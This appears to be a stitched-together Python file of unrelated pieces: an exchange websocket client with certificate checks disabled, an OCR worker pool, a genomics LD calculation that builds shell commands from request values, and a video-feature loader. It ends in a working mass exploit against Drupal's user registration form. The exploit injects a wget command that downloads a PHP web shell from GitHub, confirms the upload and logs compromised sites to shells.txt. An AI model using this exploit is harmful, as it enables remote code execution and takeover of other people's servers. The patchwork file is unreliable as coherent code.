    def closeDataStream(self):
        """Stop the market-data reader thread, if one was started."""
        self.dataStreamActive = False
        # The thread only exists after a successful initDataStream().
        if self.dataStreamThread is not None:
            self.dataStreamThread.join()

    def connectDataStream(self):
        """Open the market-data websocket; return True on success."""
        try:
            self.dataStreamWs = create_connection(
                self.dataStreamUrl, sslopt={'cert_reqs': ssl.CERT_NONE})
            return True
        except Exception:
            msg = traceback.format_exc()
            self.onDataStreamError('Connecting data stream falied: %s' % msg)
            return False

    def onDataStreamError(self, msg):
        """Called with status/error messages of the market-data stream."""
        print(msg)

    def onMarketData(self, data):
        """Called with every decoded market-data message."""
        print(data)

    def initUserStream(self, key):
        """Connect the user-data websocket for ``key`` and start its threads."""
        self.userStreamKey = key
        self.userStreamUrl = USERSTREAM_ENDPOINT + key

        result = self.connectUserStream()
        if result:
            self.userStreamActive = True
            self.userStreamThread = Thread(target=self.runUserStream)
            self.userStreamThread.start()

            self.keepaliveThread = Thread(target=self.runKeepalive)
            self.keepaliveThread.start()

    def runUserStream(self):
        """Reader loop: decode each message as JSON, reconnect on any error."""
        while self.userStreamActive:
            try:
                stream = self.userStreamWs.recv()
                data = json.loads(stream)
                self.onUserData(data)
            except Exception:
                self.onUserStreamError('User stream connection lost')
                result = self.connectUserStream()
                if not result:
                    self.onUserStreamError(u'Waiting 3 seconds to reconnect')
                    sleep(3)
                else:
                    self.onUserStreamError(u'User stream reconnected')

    def closeUserStream(self):
        """Stop the user-data reader and keepalive threads, if started."""
        self.userStreamActive = False
        # Both threads only exist after a successful initUserStream().
        if self.userStreamThread is not None:
            self.userStreamThread.join()
        if self.keepaliveThread is not None:
            self.keepaliveThread.join()

    def connectUserStream(self):
        """Open the user-data websocket; return True on success."""
        try:
            self.userStreamWs = create_connection(
                self.userStreamUrl, sslopt={'cert_reqs': ssl.CERT_NONE})
            return True
        except Exception:
            msg = traceback.format_exc()
            self.onUserStreamError('Connecting user stream falied: %s' % msg)
            return False

    def onUserStreamError(self, msg):
        """Called with status/error messages of the user-data stream."""
        print(msg)

    def onUserData(self, data):
        """Called with every decoded user-data message."""
        print(data)

    def runKeepalive(self):
        """Queue a keepalive request every 1800 one-second ticks."""
        while self.userStreamActive:
            self.keepaliveCount += 1

            if self.keepaliveCount >= 1800:
                self.keepaliveCount = 0
                self.keepaliveStream(self.userStreamKey)

            sleep(1)
def multithread_processor(self, to_pdf=False, to_text=False, gen_images=False):
    """Run one processing step over all pages/images using a worker pool.

    Exactly one mode is executed; when several flags are set the first of
    ``to_pdf``, ``to_text``, ``gen_images`` wins.  The work items are split
    into at most ``self.pool_size`` contiguous chunks, one per pool task.

    :param to_pdf: run tesseract on every ``*.png`` in ``self.images_folder``
        and produce a PDF per image.
    :param to_text: run tesseract on every ``*.png`` in ``self.images_folder``
        and produce its default (text) output per image.
    :param gen_images: render pages ``1..self.pages`` of ``self.file_path`` to
        PNG files in ``self.images_folder``.
    :raises ValueError: if no mode flag is set.
    """
    # Local import: the argument-list form avoids building a shell command
    # string, so paths containing spaces or shell metacharacters are safe.
    import subprocess

    tesseract_cmd = ['tesseract', '--oem', '1', '-l', 'eng', '--psm', '6']

    def image_to_pdf(image_paths):
        for image_path in image_paths:
            print(image_path)
            if self.pdf_type == 'image':
                filename = '%s/%s-%s_1' % (
                    self.images_folder, self.filename,
                    image_path.split('.')[-2].split('-')[-1])
            else:
                filename = image_path.split('.png')[0]
            print(filename)
            subprocess.call(tesseract_cmd + [image_path, filename, 'pdf'])
        return 0

    def image_to_text(image_paths):
        for image_path in image_paths:
            print(image_path)
            # NOTE(review): image_path comes from glob and already starts
            # with images_folder, so the folder appears twice in filename -
            # confirm this is intended.
            filename = '%s/%s' % (self.images_folder, image_path.split('.')[0])
            print(filename)
            subprocess.call(tesseract_cmd + [image_path, filename])
        return 0

    def generate_images(pages_list):
        for p_num in pages_list:
            print('Generating images %s' % p_num)
            convert_from_path(self.file_path,
                              dpi=self.generate_images_dpi,
                              output_folder=self.images_folder,
                              first_page=p_num,
                              last_page=p_num,
                              fmt='png')
            print('Generating images completed %s' % p_num)
        return 0

    if to_pdf:
        paths = glob.glob('%s/*.png' % self.images_folder)
        print(paths)
        worker = image_to_pdf
    elif to_text:
        paths = glob.glob('%s/*.png' % self.images_folder)
        worker = image_to_text
    elif gen_images:
        paths = list(range(1, self.pages + 1))  # pages_list
        worker = generate_images
    else:
        raise ValueError(
            'one of to_pdf, to_text or gen_images must be set')

    # Integer arithmetic gives exact, contiguous chunk boundaries; stepping a
    # float accumulator can drift and emit an extra, overlapping chunk.
    n_chunks = self.pool_size
    total = len(paths)
    chunks = []
    for i in range(n_chunks):
        chunk = paths[i * total // n_chunks:(i + 1) * total // n_chunks]
        if chunk:
            chunks.append(chunk)

    pool = Pool(self.pool_size)
    try:
        pool.map(worker, chunks)
    finally:
        pool.close()
        pool.join()
    print('Done multiprocessing')
def calculate_express(snplst, pop, request, web, tissues, r2_d, genome_build, r2_d_threshold=0.1, p_threshold=0.1, window=500000):
    """Run the LDexpress calculation for a list of query variants.

    For every valid query variant the surrounding window is split into
    ``num_subprocesses`` chunks that are handled by ``LDexpress_ld_sub.py``
    subprocesses; their output is then passed to ``LDexpress_tissues_sub.py``
    subprocesses and the combined rows are collected.

    :param snplst: query variants joined with ``+`` (rs numbers or
        ``chr:pos`` coordinates); at most 10 entries.
    :param pop: population codes joined with ``+``.
    :param request: request identifier; used in the names of temporary files.
    :param web: flag selecting how the MongoDB connection is made; also
        forwarded to the subprocesses.
    :param tissues: forwarded unchanged to the tissue subprocesses.
    :param r2_d: forwarded unchanged to the LD subprocesses.
    :param genome_build: key of ``genome_build_vars``.
    :param r2_d_threshold: forwarded unchanged to the LD subprocesses.
    :param p_threshold: forwarded unchanged to the tissue subprocesses.
    :param window: window size; must be between 0 and 1,000,000.
    :return: ``(sanitized_query_snps, thinned_snps, thinned_genes,
        thinned_tissues, details, errors_warnings)``.  On a fatal problem the
        first five items are empty strings and ``errors_warnings["error"]``
        carries the message.
    """
    print("##### START LD EXPRESS CALCULATION #####")
    print("raw snplst", snplst)
    print("raw pop", pop)
    print("raw request", request)
    print("raw web", web)
    print("raw tissues", tissues)
    print("raw r2_d", r2_d)
    print("raw r2_d_threshold", r2_d_threshold)
    print("raw p_threshold", p_threshold)
    print("raw window", window)
    print("raw genome_build", genome_build)

    full_start = timer()

    # SNP limit
    max_list = 10

    # Ensure tmp directory exists
    if not os.path.exists(tmp_dir):
        os.makedirs(tmp_dir)

    errors_warnings = {}

    # Validate genome build param
    if genome_build not in genome_build_vars['vars']:
        errors_warnings[
            "error"] = "Invalid genome build. Please specify either " + ", ".join(
                genome_build_vars['vars']) + "."
        return ("", "", "", "", "", errors_warnings)

    # Validate window size is between 0 and 1,000,000
    if window < 0 or window > 1000000:
        errors_warnings[
            "error"] = "Window value must be a number between 0 and 1,000,000."
        return ("", "", "", "", "", errors_warnings)

    # Parse SNPs list
    snps_raw = snplst.split("+")

    # Generate error if # of inputted SNPs exceeds limit
    if len(snps_raw) > max_list:
        errors_warnings["error"] = "Maximum SNP list is " + \
            str(max_list)+" RS numbers. Your list contains " + \
            str(len(snps_raw))+" entries."
        return ("", "", "", "", "", errors_warnings)

    # Remove duplicate RS numbers.  Entries are stored as one-element lists,
    # so the membership test has to compare against [snp]; comparing the bare
    # string never matched and let duplicates through.
    sanitized_query_snps = []
    for snp_raw in snps_raw:
        snp = snp_raw.strip()
        if [snp] not in sanitized_query_snps:
            sanitized_query_snps.append([snp])

    # Connect to Mongo database
    if env == 'local':
        mongo_host = api_mongo_addr
    else:
        mongo_host = 'localhost'
    if web:
        client = MongoClient(
            'mongodb://' + mongo_username + ':' + mongo_password + '@' +
            mongo_host + '/admin', mongo_port)
    else:
        if env == 'local':
            client = MongoClient(
                'mongodb://' + mongo_username + ':' + mongo_password + '@' +
                mongo_host + '/admin', mongo_port)
        else:
            client = MongoClient('localhost', mongo_port)
    db = client["LDLink"]

    # Check if dbsnp collection in MongoDB exists, if not, display error
    if "dbsnp" not in db.list_collection_names():
        errors_warnings[
            "error"] = "dbSNP is currently unavailable. Please contact support."
        return ("", "", "", "", "", errors_warnings)

    # Select desired ancestral populations
    pops = pop.split("+")
    pop_dirs = []
    for pop_i in pops:
        if pop_i in [
                "ALL", "AFR", "AMR", "EAS", "EUR", "SAS", "ACB", "ASW", "BEB",
                "CDX", "CEU", "CHB", "CHS", "CLM", "ESN", "FIN", "GBR", "GIH",
                "GWD", "IBS", "ITU", "JPT", "KHV", "LWK", "MSL", "MXL", "PEL",
                "PJL", "PUR", "STU", "TSI", "YRI"
        ]:
            pop_dirs.append(data_dir + population_samples_dir + pop_i + ".txt")
        else:
            errors_warnings[
                "error"] = pop_i + " is not an ancestral population. Choose one of the following ancestral populations: AFR, AMR, EAS, EUR, or SAS; or one of the following sub-populations: ACB, ASW, BEB, CDX, CEU, CHB, CHS, CLM, ESN, FIN, GBR, GIH, GWD, IBS, ITU, JPT, KHV, LWK, MSL, MXL, PEL, PJL, PUR, STU, TSI, or YRI."
            return ("", "", "", "", "", errors_warnings)

    # Concatenate the sample lists of all selected populations into one
    # request-specific temp file and read the unique sample ids back.
    get_pops = "cat " + " ".join(
        pop_dirs) + " > " + tmp_dir + "pops_" + request + ".txt"
    subprocess.call(get_pops, shell=True)

    with open(tmp_dir + "pops_" + request + ".txt") as pops_file:
        pop_list = pops_file.readlines()

    ids = [i.strip() for i in pop_list]
    pop_ids = list(set(ids))

    # Get rs number from genomic coordinates from dbsnp
    def get_rsnum(db, coord):
        temp_coord = coord.strip("chr").split(":")
        chro = temp_coord[0]
        pos = temp_coord[1]
        query_results = db.dbsnp.find({
            "chromosome": str(chro),
            genome_build_vars[genome_build]['position']: str(pos)
        })
        query_results_sanitized = json.loads(json_util.dumps(query_results))
        return query_results_sanitized

    # Replace input genomic coordinates with variant ids (rsids)
    def replace_coords_rsid(db, snp_lst):
        new_snp_lst = []
        for snp_raw_i in snp_lst:
            if snp_raw_i[0][0:2] == "rs":
                new_snp_lst.append(snp_raw_i)
            else:
                snp_info_lst = get_rsnum(db, snp_raw_i[0])
                if snp_info_lst != None:
                    if len(snp_info_lst) > 1:
                        var_id = "rs" + snp_info_lst[0]['id']
                        ref_variants = []
                        for snp_info in snp_info_lst:
                            if snp_info['id'] == snp_info['ref_id']:
                                ref_variants.append(snp_info['id'])
                        if len(ref_variants) > 1:
                            var_id = "rs" + ref_variants[0]
                            if "warning" in errors_warnings:
                                errors_warnings["warning"] = errors_warnings["warning"] + \
                                    ". Multiple rsIDs (" + ", ".join(["rs" + ref_id for ref_id in ref_variants]) + ") map to genomic coordinates " + snp_raw_i[0]
                            else:
                                errors_warnings[
                                    "warning"] = "Multiple rsIDs (" + ", ".join(
                                        [
                                            "rs" + ref_id
                                            for ref_id in ref_variants
                                        ]
                                    ) + ") map to genomic coordinates " + snp_raw_i[
                                        0]
                        elif len(ref_variants) == 0 and len(snp_info_lst) > 1:
                            var_id = "rs" + snp_info_lst[0]['id']
                            if "warning" in errors_warnings:
                                errors_warnings["warning"] = errors_warnings["warning"] + \
                                    ". Multiple rsIDs (" + ", ".join(["rs" + ref_id for ref_id in ref_variants]) + ") map to genomic coordinates " + snp_raw_i[0]
                            else:
                                errors_warnings[
                                    "warning"] = "Multiple rsIDs (" + ", ".join(
                                        [
                                            "rs" + ref_id
                                            for ref_id in ref_variants
                                        ]
                                    ) + ") map to genomic coordinates " + snp_raw_i[
                                        0]
                        else:
                            var_id = "rs" + ref_variants[0]
                        new_snp_lst.append([var_id])
                    elif len(snp_info_lst) == 1:
                        var_id = "rs" + snp_info_lst[0]['id']
                        new_snp_lst.append([var_id])
                    else:
                        new_snp_lst.append(snp_raw_i)
                else:
                    new_snp_lst.append(snp_raw_i)
        return new_snp_lst

    sanitized_query_snps = replace_coords_rsid(db, sanitized_query_snps)
    print("sanitized_query_snps", sanitized_query_snps)

    # Find genomic coords of query snps in dbsnp
    details = {}
    rs_nums = []
    snp_pos = []
    snp_coords = []
    warn = []
    queryWarnings = []
    for snp_i in sanitized_query_snps:
        if (len(snp_i) > 0 and len(snp_i[0]) > 2):
            if (snp_i[0][0:2] == "rs"
                    or snp_i[0][0:3] == "chr") and snp_i[0][-1].isdigit():
                # query variant to get genomic coordinates in dbsnp
                snp_coord = get_coords(db, snp_i[0])
                if snp_coord != None and snp_coord[
                        genome_build_vars[genome_build]['position']] != "NA":
                    # check if variant is on chrY for genome build = GRCh38
                    if snp_coord['chromosome'] == "Y" and (
                            genome_build == "grch38"
                            or genome_build == "grch38_high_coverage"):
                        if "warning" in errors_warnings:
                            errors_warnings["warning"] = errors_warnings["warning"] + \
                                ". " + "Input variants on chromosome Y are unavailable for GRCh38, only available for GRCh37 (" + "rs" + snp_coord['id'] + " = chr" + snp_coord['chromosome'] + ":" + snp_coord[genome_build_vars[genome_build]['position']] + ")"
                        else:
                            errors_warnings[
                                "warning"] = "Input variants on chromosome Y are unavailable for GRCh38, only available for GRCh37 (" + "rs" + snp_coord[
                                    'id'] + " = chr" + snp_coord[
                                        'chromosome'] + ":" + snp_coord[
                                            genome_build_vars[genome_build]
                                            ['position']] + ")"
                        warn.append(snp_i[0])
                    else:
                        rs_nums.append(snp_i[0])
                        snp_pos.append(snp_coord[
                            genome_build_vars[genome_build]['position']])
                        temp = [
                            snp_i[0],
                            str(snp_coord['chromosome']),
                            int(snp_coord[genome_build_vars[genome_build]
                                          ['position']])
                        ]
                        snp_coords.append(temp)
                else:
                    # Generate warning if query variant is not found in dbsnp
                    warn.append(snp_i[0])
                    queryWarnings.append([
                        snp_i[0], "NA", "Variant not found in dbSNP" +
                        dbsnp_version + ", variant removed."
                    ])
            else:
                # Generate warning if query variant is not a genomic position or rs number
                warn.append(snp_i[0])
                queryWarnings.append(
                    [snp_i[0], "NA", "Not a valid SNP, variant removed."])
        else:
            # Generate error for empty query variant
            errors_warnings["error"] = "Input list of RS numbers is empty"
            subprocess.call("rm " + tmp_dir + "pops_" + request + ".txt",
                            shell=True)
            return ("", "", "", "", "", errors_warnings)

    # Generate warnings for query variants not found in dbsnp
    if warn != []:
        if "warning" in errors_warnings:
            errors_warnings["warning"] = errors_warnings["warning"] + \
                ". The following RS number(s) or coordinate(s) inputs have warnings: " + ", ".join(warn)
        else:
            errors_warnings[
                "warning"] = "The following RS number(s) or coordinate(s) inputs have warnings: " + ", ".join(
                    warn)

    # Generate errors if no query variants are valid in dbsnp
    if len(rs_nums) == 0:
        errors_warnings[
            "error"] = "Input SNP list does not contain any valid RS numbers or coordinates. " + errors_warnings[
                "warning"]
        subprocess.call("rm " + tmp_dir + "pops_" + request + ".txt",
                        shell=True)
        return ("", "", "", "", "", errors_warnings)

    thinned_snps = []

    print("##### FIND GWAS VARIANTS IN WINDOW #####")
    # establish low/high window for each query snp
    # ex: window = 500000 # -/+ 500Kb = 500,000Bp = 1Mb = 1,000,000 Bp total
    combined_matched_snps = []
    for snp_coord in snp_coords:
        find_window_ld_start = timer()

        (geno,
         queryVariantWarnings) = get_query_variant(snp_coord, pop_ids,
                                                   str(request), genome_build)
        if (len(queryVariantWarnings) > 0):
            queryWarnings += queryVariantWarnings
        if (geno is not None):
            ###### SPLIT TASK UP INTO # PARALLEL SUBPROCESSES ######

            # find query window snps via tabix, calculate LD and apply R2/D' thresholds
            windowChunkRanges = chunkWindow(snp_coord[2], window,
                                            num_subprocesses)

            ld_subprocess_commands = []
            for subprocess_id in range(num_subprocesses):
                getWindowVariantsArgs = " ".join([
                    str(web),
                    str(snp_coord[0]),
                    str(snp_coord[1]),
                    str(windowChunkRanges[subprocess_id][0]),
                    str(windowChunkRanges[subprocess_id][1]),
                    str(request),
                    str(subprocess_id),
                    str(r2_d),
                    str(r2_d_threshold),
                    str(genome_build)
                ])
                ld_subprocess_commands.append("python3 LDexpress_ld_sub.py " +
                                              getWindowVariantsArgs)

            ld_subprocesses = [
                subprocess.Popen(command, shell=True, stdout=subprocess.PIPE)
                for command in ld_subprocess_commands
            ]

            # collect output in parallel
            pool = Pool(len(ld_subprocesses))
            windowLDSubsets = pool.map(get_output, ld_subprocesses)
            pool.close()
            pool.join()

            # flatten pooled ld window results
            windowLDSubsetsFlat = [
                val.decode('utf-8').strip().split("\t")
                for sublist in windowLDSubsets for val in sublist
            ]

            find_window_ld_end = timer()

            # find gtex tissues for window snps via mongodb, apply p-value threshold
            query_window_tissues_start = timer()

            # Each tissue subprocess reads its share of the LD rows from a
            # file named after its id and the request.
            windowLDSubsetsChunks = np.array_split(windowLDSubsetsFlat,
                                                   num_subprocesses)

            for subprocess_id in range(num_subprocesses):
                with open(
                        tmp_dir + 'express_ld_' + str(subprocess_id) + '_' +
                        str(request) + '.txt', 'w') as snpsLDFile:
                    for snp_ld_data in windowLDSubsetsChunks[
                            subprocess_id].tolist():
                        snpsLDFile.write("\t".join(snp_ld_data) + "\n")

            tissues_subprocess_commands = []
            for subprocess_id in range(num_subprocesses):
                getTissuesArgs = " ".join([
                    str(web),
                    str(request),
                    str(subprocess_id),
                    str(p_threshold),
                    str(tissues),
                    str(genome_build)
                ])
                tissues_subprocess_commands.append(
                    "python3 LDexpress_tissues_sub.py " + getTissuesArgs)

            tissues_subprocesses = [
                subprocess.Popen(command, shell=True, stdout=subprocess.PIPE)
                for command in tissues_subprocess_commands
            ]

            # collect output in parallel
            pool = Pool(len(tissues_subprocesses))
            tissueResultsSubsets = pool.map(get_output, tissues_subprocesses)
            pool.close()
            pool.join()

            # flatten pooled tissues results
            matched_snps = [
                val.decode('utf-8').strip().split("\t")
                for sublist in tissueResultsSubsets for val in sublist
            ]

            if (len(matched_snps) > 0):
                combined_matched_snps += matched_snps
                # add snp to thinned_snps
                thinned_snps.append(snp_coord[0])
            else:
                queryWarnings.append([
                    snp_coord[0],
                    "chr" + str(snp_coord[1]) + ":" + str(snp_coord[2]),
                    "No entries in GTEx are identified using the LDexpress search criteria."
                ])

            query_window_tissues_end = timer()
            print(
                "QUERY WINDOW TISSUES TIME ELAPSED:",
                str(query_window_tissues_end - query_window_tissues_start) +
                "(s)")

        # clean up tmp files generated by each query snp
        subprocess.call("rm " + tmp_dir + "*" + request + "*.vcf", shell=True)
        subprocess.call("rm " + tmp_dir + "express_ld_*_" + str(request) +
                        ".txt",
                        shell=True)

    # add full results
    details["results"] = {"aaData": combined_matched_snps}

    # find unique thinned genes and tissues (columns 5 and 7 of each row)
    thinned_genes = sorted(
        list(set(list(map(lambda row: row[5], combined_matched_snps)))))
    thinned_tissues = sorted(
        list(set(list(map(lambda row: row[7], combined_matched_snps)))))

    # clean up tmp file(s) generated by each calculation
    subprocess.call("rm " + tmp_dir + "pops_" + request + ".txt", shell=True)

    details["queryWarnings"] = {"aaData": queryWarnings}

    # Check if thinned list is empty, if it is, display error
    if len(thinned_snps) < 1:
        errors_warnings[
            "error"] = "No entries in GTEx are identified using the LDexpress search criteria."
        return ("", "", "", "", "", errors_warnings)

    full_end = timer()
    print("TIME ELAPSED:", str(full_end - full_start) + "(s)")
    print("##### LDEXPRESS COMPLETE #####")
    return (sanitized_query_snps, thinned_snps, thinned_genes, thinned_tissues,
            details, errors_warnings)
class AsyncVideoFeaturesLoaderBreakfast():
    """
    Load pre-computed features for video frames, one batch at a time,
    in the background using a pool of workers.

    Typical use: call ``load_feats_in_batch(k)``, poll ``is_busy()`` until it
    returns ``False``, then fetch the result with ``get_batch_data()``.

    NOTE(review): the workers write directly into ``self.__batch_features``,
    so ``Pool`` is presumably a thread pool (e.g. ``multiprocessing.dummy.Pool``);
    with a process pool those writes would not reach this object - confirm
    against the file's imports.
    """

    def __init__(self, feats_path, target, n_frames_per_video, batch_size,
                 n_feat_maps, feat_map_side_dim, n_threads=10):
        """
        :param feats_path: sequence of feature-file paths; it is sliced per
            batch and fancy-indexed in ``shuffle_data`` (presumably a numpy
            array - verify against caller)
        :param target: labels aligned with ``feats_path``, indexed the same way
        :param n_frames_per_video: expected number of feature entries per file
        :param batch_size: number of videos per batch
        :param n_feat_maps: size of the last axis of the batch buffer
        :param feat_map_side_dim: size of the two spatial axes of the batch buffer
        :param n_threads: number of workers in the pool
        """
        # seeds the *global* python and numpy RNGs, not a private generator
        random.seed(101)
        np.random.seed(101)

        self.__feats_pathes = feats_path
        self.__n_frames_per_video = n_frames_per_video
        self.__n_feat_maps = n_feat_maps
        self.__feat_map_side_dim = feat_map_side_dim
        self.__batch_size = batch_size
        self.__y = target

        self.__is_busy = False
        self.__batch_features = None
        self.__batch_y = None

        self.__n_threads_in_pool = n_threads
        self.__pool = Pool(self.__n_threads_in_pool)

    def load_feats_in_batch(self, batch_number):
        """
        Start loading the features of one batch in the background.

        :param batch_number: 1-based index of the batch to load
        :raises AssertionError: if the path slice and the label slice of the
            batch have different lengths
        """
        idx_batch = batch_number - 1
        start_idx = idx_batch * self.__batch_size
        stop_idx = start_idx + self.__batch_size

        batch_feat_pathes = self.__feats_pathes[start_idx:stop_idx]
        batch_y = self.__y[start_idx:stop_idx]
        n_batch_feats = len(batch_feat_pathes)

        # validate before raising the busy flag, so that a failed check
        # cannot leave the loader stuck in the busy state
        assert n_batch_feats == len(batch_y)

        self.__is_busy = True

        # allocate the batch buffer before reading starts; a row whose file
        # fails to load simply stays all-zero
        batch_feats_shape = (n_batch_feats, self.__n_frames_per_video,
                             self.__feat_map_side_dim,
                             self.__feat_map_side_dim, self.__n_feat_maps)
        self.__batch_features = np.zeros(batch_feats_shape, dtype=np.float32)
        self.__batch_y = batch_y

        if n_batch_feats == 0:
            # nothing to read; for an empty iterable the pool's map_async
            # completes without invoking the callback, which would leave
            # the busy flag set forever
            self.__is_busy = False
            return

        # each worker receives (row index in the batch, path of the file)
        params = list(enumerate(batch_feat_pathes))

        # start pool of threads
        self.__pool.map_async(self.__load_features, params,
                              callback=self.__thread_pool_callback)

    def get_batch_data(self):
        """
        Return ``(batch_features, batch_y)`` of the most recently loaded batch.

        :raises Exception: if a batch is still being loaded
        """
        if self.__is_busy:
            raise Exception(
                'Sorry, you can\'t get features while threads are running!')
        return (self.__batch_features, self.__batch_y)

    def get_y(self):
        """Return the full list of targets (in their current, possibly shuffled, order)."""
        return self.__y

    def is_busy(self):
        """Return ``True`` while a batch is being loaded."""
        return self.__is_busy

    def __thread_pool_callback(self, args):
        # invoked by the pool once every item of the batch has been processed
        self.__is_busy = False

    def __load_features(self, params):
        """
        Worker: read one feature file into its row of the batch buffer.

        :param params: tuple ``(row index in the batch, path of the feature file)``

        Any failure is printed and swallowed, so one bad file does not
        abort the rest of the batch.
        """
        idx_video, feats_path = params[0], params[1]

        try:
            # load feature from file
            feats = utils.pkl_load(feats_path)

            n_feats = len(feats)
            assert n_feats == self.__n_frames_per_video, 'Sorry, wrong number of frames, expected: %d, got: %d' % (
                self.__n_frames_per_video, n_feats)
            self.__batch_features[idx_video] = feats
        except Exception as exp:
            print('\nSorry, error in loading feature %s' % (feats_path))
            print(exp)

    def shuffle_data(self):
        """
        Shuffle self.__feats_pathes and self.__y in unison, using one random
        permutation drawn from the global numpy RNG.

        :return:
        """
        n_samples = len(self.__feats_pathes)

        # np.arange (not range): np.random.shuffle works in place and a
        # python-3 range object is immutable
        idx = np.arange(n_samples)
        np.random.shuffle(idx)

        self.__feats_pathes = self.__feats_pathes[idx]
        self.__y = self.__y[idx]

    def close(self):
        """Stop accepting work and shut the worker pool down."""
        self.__pool.close()
        self.__pool.terminate()
'markup', 'mail[#markup]': 'wget https://raw.githubusercontent.com/dr-iman/SpiderProject/master/lib/exploits/web-app/wordpress/ads-manager/payload.php' } headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36' } def run(u): try: url = u + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' r = requests.post(url, data=payload, verify=False, headers=headers) if 'Select Your File :' in requests.get(u + '/payload.php', verify=False, headers=headers).text: print(u, '==> RCE') with open('shells.txt', mode='a') as d: d.write(u + '/payload.php\n') else: print(u, "==> Not Vuln") except: pass mp = Pool(150) mp.map(run, target) mp.close() mp.join()